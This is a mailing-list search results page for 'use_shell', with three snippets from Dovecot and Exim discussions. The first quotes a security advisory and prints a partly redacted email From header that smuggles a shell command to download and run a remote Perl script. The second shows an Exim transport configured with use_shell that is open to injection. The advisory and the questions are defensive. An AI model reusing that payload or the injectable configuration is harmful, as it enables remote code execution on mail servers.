search for: use_shel

Displaying 3 results from an estimated 3 matches for "use_shel".

Did you mean: use_shell
2013 Jun 09
1
from ISC: Exim/Dovecot exploit making the rounds
...email server. The exploit partially looked like this: From: x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com (Obviously edited for your safety, and I didn't post the whole thing.) This is an exploit against Dovecot that is using the feature "use_shell" against itself. This feature, unfortunately, is found in the example wiki on Dovecot's website, and also in their example configuration. We'd caution anyone that is using Dovecot to take a look at their configuration and make use they aren't using the "use_shell"...
2013 Jul 30
2
Calling dovecot-lda correctly from exim for virtual user setup
...ng Dovecot 2.1.7 on Debian. Exim is the MTA. I was recently made aware of the fact that the way in which Exim invokes dovecot-lda is prone to code injection: dovecot_virtual_delivery: driver = pipe command = HOME=/home/vmail/\$local_part /usr/lib/dovecot/dovecot-lda -f \$sender_address use_shell .. I.e. a command is executed via the shell, and Exim uses non-sanitized user input (mail header fields) to construct the command. Now, the reason I invoked dovecot like that is to pass a plausible value for the HOME environment variable, so that dovecot-lda can determine where the Maildir...
2010 Dec 19
1
stat(/..../Maildir/cur) failed: No such file or directory
...known account $local_part@$domain exim transport: dovecot_delivery: driver = pipe command = /usr/local/libexec/dovecot/dovecot-lda -e -k -d $local_part@$domain \ -f $sender_address -a $original_local_part@$original_domain -m INBOX #use_shell user = mailnull message_prefix = "" message_suffix = "" return_path_add = true envelope_to_add = true delivery_date_add = true temp_errors = 64 : 69 : 70: 71 : 72 : 73 : 74 : 75 : 78 log_output And my pr...